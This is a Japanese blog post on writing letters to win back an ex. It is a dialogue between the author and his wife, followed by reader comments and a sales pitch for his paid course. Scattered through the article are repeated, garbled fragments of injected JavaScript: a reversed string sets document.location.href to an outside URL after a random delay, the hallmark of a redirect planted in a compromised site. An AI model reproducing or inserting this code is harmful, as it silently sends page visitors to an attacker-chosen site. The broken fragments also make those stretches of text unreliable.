【元カノに聞いた!】彼女に送る成功する復縁手紙の書き方※例文

この記事は8分で読めます

こんにちは、復縁ドッグです。

私は、1年2カ月かけて自力復縁に成功し、

今では、その彼女と結婚しました。

1年2カ月!自力復縁体験記

 

このページでは、復縁相手でもあり、現在の妻でもある愛と、

当時を思い出しながら、復縁に役に立つ、1つのテーマについて、話し合いました。

第一回別れの理由を追及編はこちら

 

復縁する側、復縁される側での意見の違い、

普段は聞けない、復縁を求められる側の本音を、

聞き出していますので、参考になると思います。

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px solid #460e44; background-color: #e7e7eb;”>

今回のテーマは、

【どんな手紙だったら復縁に有効なのか】です。

 

では、復縁を求められる側の本音を、

聞いていきましょう。

 

 

※この対談を撮るにあたり、すべては読者の方の為と説得し、

私に気を使わないよう、愛には本音だけを語ってもらってます。

 

言いづらそうにしている部分も、すべてさらけ出してもらいました。

話すのが辛そうでしたが、ここからは、その内容を、すべて、

ありのまま、載せています。

 

多少、聞き苦しい部分もあるかもしれませんが、

これが、別れを言い出す側の心理ですので、

本音を語ってくれた、愛を責めないでくださいね。

 

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #eebbcb;”>

復縁ドッグ

「じゃあ、今回で、第4回目になるけど、

今日も、よろしくお願いします。」

 

「はい、お願いします。」

 

復縁ドッグ

「いきなりなんだけど、もらって嬉しい手紙って、

どういうものだと思う?」

 

「手紙…?」

 

復縁ドッグ

「うん、もらって、嬉しい手紙。」

 

「もらって嬉しい、手紙か…。」

 

復縁ドッグ

「復縁を考えた場合、もらって嬉しい、手紙って

あるのかな~って…。」

 

「う~ん、どうかな~?」

 

復縁ドッグ

「そう考えちゃうと、手紙って、嬉しくないのかな~?」

 

「新しく、気になる人ができたっていう、前提でいいの?」

 

復縁ドッグ

「そうだね。」

 

「新しい人ができて、付き合ったとして、関係が悪化している時に、

手紙が来たとしたら、そこまで嫌じゃないかな~?」

 

復縁ドッグ

「ふ~ん、どういう内容でも?」

 

「内容は大事だよ。」

 

復縁ドッグ

「どういう内容?」

 

「う~ん、手紙か~、難しいな…。」

 

復縁ドッグ

「やっぱり、手紙って、難しいんだよね。

手紙、自体、普段メールが主流でしょ。だから、あまり書かないんだよ。

だから、手紙自体が、すでに、重いんだよね。」

 

「重いよね。」

 

復縁ドッグ

「だから、手紙を書くのって結構、賭けであって…。」

 

「そうだよね。」

 

復縁ドッグ

「当たれば、かなり爆発的な力を、生むのかなって思うけど、

外した時のダメージが、もう…。」

 

「うん。」

 

復縁ドッグ

「だって、外した時の手紙って、一歩間違ったら、もらう側としては、

正直、気持ち悪いでしょ。」

 

「…、うん。嫌だね。」

 

復縁ドッグ

「ハッキリ言って、そうだよね。」

 

「しかも、切手、貼ってなかったら、

『家まで、来たのかい!』って、思っちゃうよ。」

 

復縁ドッグ

「只今、嫌味を、言われているようです…。(笑)」

 

「(笑)」

 

 

※復縁ドッグは、当時、愛へ手紙を、何通か書きましたが、

郵送ではなく、車で自宅のポストへ、直接、届けに行ったのです。

当時の、復縁ドッグの、この奇怪な行動、完全にNG行動ですので、

これを読んでいる方、絶対、やってはいけませんよ。

まあ、やる人は、いないと思いますが…。

 

 

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #eebbcb;”>

復縁ドッグ

「復縁ドッグが思う、手紙の一番のベストな形としてはね、

まずは、キレイに、別れるじゃない。」

 

「うん。」

 

復縁ドッグ

「その後に、もう一度、感謝の気持ちを書いた、手紙を送るの。」

 

「いや~、重いな、それ。」

 

復縁ドッグ

「重い?」

 

「『復縁したいんじゃん。』って、思っちゃう。」

 

復縁ドッグ

「じゃあさ~、別れ話が出た時に、一旦、分かったって、

話を保留にさせてもらってさ~。」

 

「うん。」

 

復縁ドッグ

「その2、3日後に、家に手紙が届くの。」

 

「…。」

 

復縁ドッグ

「内容は、今まで付き合ってくれた、感謝の気持ちと、別れたくないけど、

彼女(相手)の気持ちを尊重して、別れを選ぶことが書いてあるの。」

 

「うんうん。」

 

復縁ドッグ

「本当は、会って話したかったんだけど、会っちゃうと、

気持ちがぶれちゃいそうだし、上手く伝えられないと思ったから、

手紙にして、想いを書きました。」

 

「うん」

 

復縁ドッグ

「みたいな内容にして、渡すの。

これ、どう思う?」

 

「いいね~。しかも、『何か困ったことがあったら、言ってね。』

みたいな内容も、書いてあったり。」

 

復縁ドッグ

「そうそう、『すごく好きだから…。まだ、自分は未熟で、会っちゃうと、

すがっちゃいそうだし、引き止めちゃうと思うから…。』って書いてあるの。」

 

「うんうん、いいと思う。」

 

復縁ドッグ

「『●●(復縁相手)が、別れたいって、思っている気持ちは、

大事にしていきたいから、手紙でごめんね。』って書いてあるの。

こういう手紙は、アリだと思う?」

 

「アリだね。」

 

復縁ドッグ

「じゃあさ~、半年ぐらい何も連絡しないで、

いきなり、『元気~』って、手紙が届いたらどう思う?」

 

「メールができる状態なのに?」

 

復縁ドッグ

「うん。」

 

「何で、手紙なの?って思う。」

 

復縁ドッグ

「(笑)…。そう考えると、手紙って厳しいよね。

嬉しい手紙って、何なんだろう?」

 

「う~ん…。」

 

復縁ドッグ

「じゃあ、これはどう?」

 

「何?」

 

復縁ドッグ

「久しぶりの手紙なんだけど、

それが、富士山の頂上からの、手紙だったら?」

 

「(笑)」

 

復縁ドッグ

「ちょっと、面白くない?」

 

「面白い♪」

 

復縁ドッグ

「『お~い、久ぶり~、今、富士山の頂上なんだ~。

頂上に付いたら、手紙が出せるって、書いてあったから…、』」

 

「うんうん。」

 

復縁ドッグ

「『誰に出そうか、考えた時に、ふと、頭に浮かんだから、

送っちゃった~。そっちは、元気かな?返事は、富士山からお願いしま~す。』

みたいな、少しおふざけが、入った感じの手紙は、どう思う?」

 

「いいと思うよ。」

 

復縁ドッグ

「『いや~、富士山、スッゴイ大変だったけど、テンション上がるわ~♪』

みたいな、なんか、楽しそうにしている感じがいいよね。」

 

「そうそう、そんなのがいい。その時、撮った、

テンション高い、写真なんか、載せてさ~。」

 

復縁ドッグ

「仲間と一緒に、楽しんでるやつね。」

 

「そうそう。そしてら、ウケるってなるよね。」

 

復縁ドッグ

「まあ、今のは、1つの例であって、実際に、これがいいか、悪いかは、

自分自身のキャラにもよるけどさ~、なんかこんな感じで、

角度を変えた、手紙みたいなのだったら、嬉しいと思うよね。」

 

「そうだね、それだったら、いいよね。

ハガキ1枚の、本当に軽いような…、旅行先から書くような…。」

 

復縁ドッグ

「ああ、海外とかだったら、いいんじゃない?」

 

「いい、いい♪」

 

復縁ドッグ

「『昔から、行きたかった、●●(国名)に、一人で、ぶらり、来ちゃいました。

みたいな、テイストで送るといいかもね。」

 

「うんうん。」

 

復縁ドッグ

「これだったら、手紙というか、ハガキになっちゃうよね。」

 

「そうだね。」

 

復縁ドッグ

「でも、軽い感じだったら、手紙でもアリかな?」

 

「そうだね、現地の人と、一緒の写真なんか、

入ってたら、もっといいと思う。」

 

復縁ドッグ

「あ~、バックパッカーのイメージか…。」

 

「うん、そう。」

 

復縁ドッグ

「あとは、何かあるかな~?あっ、沖縄にさ~、海の中にポストがあるって、

テレビで観たんだけど…。それも、同じ感じの、手紙になるよね。」

 

「そうだね。」

 

復縁ドッグ

「そういうさ、面白味がある、手紙がいいよね。」

 

「あ~、そうだね。」

 

復縁ドッグ

「なんかギャグっぽくって、明るいやつかな?」

 

「うんうん。」

 

復縁ドッグ

「送った、本人が、言うのも、あれだけど、

それ以外は、ちょっと、重いよね。」

 

「重いと思う。」

 

復縁ドッグ

「手紙は、一か八かだよね。」

 

「そうだね。」

 

復縁ドッグ

「相手が、切ない時に、ポンって届いたとしたら、

もしかしたら、反応あるかもしえないけど…。」

 

「うんうん。」

 

復縁ドッグ

「相手がラブラブだったりさ、まだ、自分に対して、負の感情が、

残っている時に、手紙が来ちゃったら、重いと感じちゃうもんね。」

 

「『ウワッ』って思っちゃう。」

 

復縁ドッグ

「うん、まあ、自分、送った人なんで、

結構、今、グサッてきてますけど…。(笑)」

 

「ああ…。(笑)」

 

復縁ドッグ

「まあ、それは冗談だけど、でも、手紙って、相手の反応が見れないしさ、

相手の状況が、分からない中、手紙を送る人って、多いでしょ。」

 

「うん。」

 

復縁ドッグ

「メールもダメ、電話もダメ、だから、最終手段で、

手紙に、想いを込めて送ります!みたいな、具合で送るんだよ。

その気持ちは、分かるんだけど、それはやっちゃダメだね。」

 

「そう思うよ。重いのはよくないと思う。」

 

復縁ドッグ

「なるほどね。」

 

はい、今回は手紙に絞って話をしてきました。

 

復縁ドッグのサイトでも、実際に、愛に送った手紙を公開してますし、

いくつか、記事も書いていますので、送ってはいけないことは、

理解できている人が、多いと思います。

 

 

ただ、1点。

実は、今回の愛との対談で、新たな発見がありました。

それは、手紙だけに関わってくることではなく、

復縁全体に、関わってくることです。

 

まあ、根本的な、基礎部分だと思いますが、私個人としては、

かなり大事な部分だと、思っています。

 

 

 

そこで、あなたに質問です↓

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #460e44; background-color: #e7e7eb;”>Q.今回の対談で、復縁ドッグは、何に気が付いたのでしょうか?

 

頑張って、自分の答えを出してから、

先に進んでくださいね。

さあ、どうですか?

『重い行動はダメ』では、浅いです。

もっと、深い、見方ができなくてはいけませんよ。

では、答えの発表です。

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #460e44; background-color: #e7e7eb;”>

A.復縁される側としては、自分に気持ちが向いている行為では、

嬉しいと感じないということです。

 

分かりますか?

 

今までの対談でも、愛が重いと感じた行為は、

自分に気持ちが、向けられている、行動なんですよ。

同じ手紙でも、自分に復縁を迫る手紙は、NGなのに対して、

富士山や、海外先からの、楽しそうな手紙はあり。

 

 

この違いは、何なのかと考えた時、

感情の矛先が、違うのではないかと感じたのです。

 

自分の感情をつづった、復縁を迫る手紙は、

当然、復縁相手へ気持ちが向いていますよね。

でも、富士山や、海外からの手紙は、自分の人生を、

楽しんでいる印象で、自分に矢印が向けられていませんか?

 

 

 

スポットライトが、復縁相手ではなく、

自分と言ってもいいでしょう。

 

 

 

どうしても、復縁したい人の頭の中は、

復縁相手のことでいっぱいです。

 

これは、ある程度、仕方がないことなのは、分かっています。

ですが、それだけでは、相手とって、自分自身が、

魅力的に映りませんし、復縁はできないんです。

 

本当の別れの原因を探し出し、改善すること。

これも、かなり大事ですが、今回の対談も

なかり大事な内容だったと思います。

 

この記事を読んで、何かを感じてもらえたら嬉しく思います。

 

 

この他、復縁に役に立つ情報は、こちらに載せ居ていますので、

なるべく多くのページに目を通し、復縁を成功させてください。

 

では、また別ページでお会いしましょう。

復縁ドッグ

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 5px solid #A9A9A9;”>

【追記】

「復縁ドッグさんのサポートは、どうやったら

受けられるんですか?」そんな、お問い合わせを、よくいただきます。

復縁ドッグの、サポートを受ける為には、当サイト経由で、

7STEPを購入する、必要がありますので、ご希望の方は、

こちらのページを、参考にして下さい。

 

⇒復縁ドッグ購入者特典一覧

tt

 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

1年2カ月復縁ドッグ復縁体験談
復縁結婚カップル対談
復縁成功報告メール

  • このエントリーをはてなブックマークに追加

関連記事

コメント

    • 竜治

    かなり参考になりました

      • 復縁ドッグ

      竜治さん、非常にコンパクトな
      こめんとありがとうございます^^
      一言でもコメントもらえると嬉しいので、
      また、参考になった記事がありましたら、
      コメントしてくださいねーー。

    • 直輝

    5まで拝見させていただきました。自分も同じような状況で今何をすればいいか分からない時これを読んだのでものすごく気持ちが楽になりました。
    冷却期間で連絡とらないようにとは思っていますがもうすぐで元カノに誕生日がきてしまうのですけど、おめでとうの一言は控えたほうがよろしいですか?

      • 復縁ドッグ

      この質問も別れ方や状況によっても変わってきますので、何とも言えませんね。
      当然ながら、別れ方が酷かったり、連絡を拒否されているのでしたら、
      送るべきではないですし、相手がどういった状況なのかが分からないことには
      ギャンブル要素はありますからね。
      コメント欄では判断できませんし、そこを判断できるようになるのが、
      恋愛レベルなんですよ。
      彼女のことをよーーく考えたうえで、結論を出す。
      当たり前のことですが、どこまで考えられたのか?
      その深さに変わってくると思いますよ(^◇^)

    • かける

    誠に勝手ながら拝見させていただきました。実はたった今別れを切り出されて、必死で復縁の方法をネットの情報をあさっております。一通り別れの話しをすませたあと、帰り際に彼女の方から「今までありがとう」と言われました。僕も感謝の気持ちを伝えたかったのですが、言葉になりませんでした。そこで、僕も手紙かメールで「今までありがとう」の気持ちを伝えたいと思っております。つき合っている時、記念日などでは手紙を交換する付き合いをしていたので「最後も手紙で伝えたい」的なことを書きたいのですが、これは逆効果でしょうか?
    不躾な質問で申し訳ありませんが、もしお答え頂ければと思います。何卒よろしくお願いいたします。

    • かける

    昨日拝見させていただき、復縁の悩みについてコメントを書かせて頂いたのですが、反映されていないようなので、もう一度書かせていただきます。重複してしまったら申し訳ありません。

    昨日彼女から別れを告げられました。倦怠期中で予感はしていたのですが、やはり言葉にされると辛かったです。彼女は「半年くらいまえからドキドキしなくなった。だから友達で居よう」と言われました。私はとても辛かったのですが、「そう思うならそうしよう」と告げ彼女の意見を尊重しました。彼女は別れ際には「今までありがとう」と言葉をかけてくれました。僕の方こそありがとうと伝えたかったのですが、とても言葉にならず「うん」としか伝えられませんでした。

    そこで、改めてメールで「今までありがとう」という気持ちと別れを受け入れたことを伝えたいのですが、
    これは復縁的な意味ではNGでしょうか。よく復縁サイトなどでは彼女からメールが来るまで動いてはならないと書いてあるものが多いですが、復縁ドッグ様の記事を読んでいるとやはり別れの原因は「私」にあり、半年1年あっても彼女から連絡が来るとは思えません。せめて、何ヶ月か後に自分をしっかり磨いてちょっとした連絡をとる時のために、別れをきちんと受け入れ彼女に本当に感謝していることを伝えたいのですがいかがでしょうか。

    • たか

    復縁まではいかないものの、電話番号 アドレスがもう分からない場合は手紙しかないかなと思います。もう別れてから10年です
    。いろんな人がいましたが、いつも思い出してしまいます。ひどい喧嘩で、手を出したのがいけないのですが、未だに後悔しています。謝りたい。前をみれない
    きっと彼女には新しい彼氏、家庭があると思うので、どうしたらいいか。手紙を出さない方がいいのですかね

    • なお

    復縁したい彼に手紙を書くのを思いとどまるために読ませていただきました(笑い)。
    これからも記事を参考にさせていただきます。

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座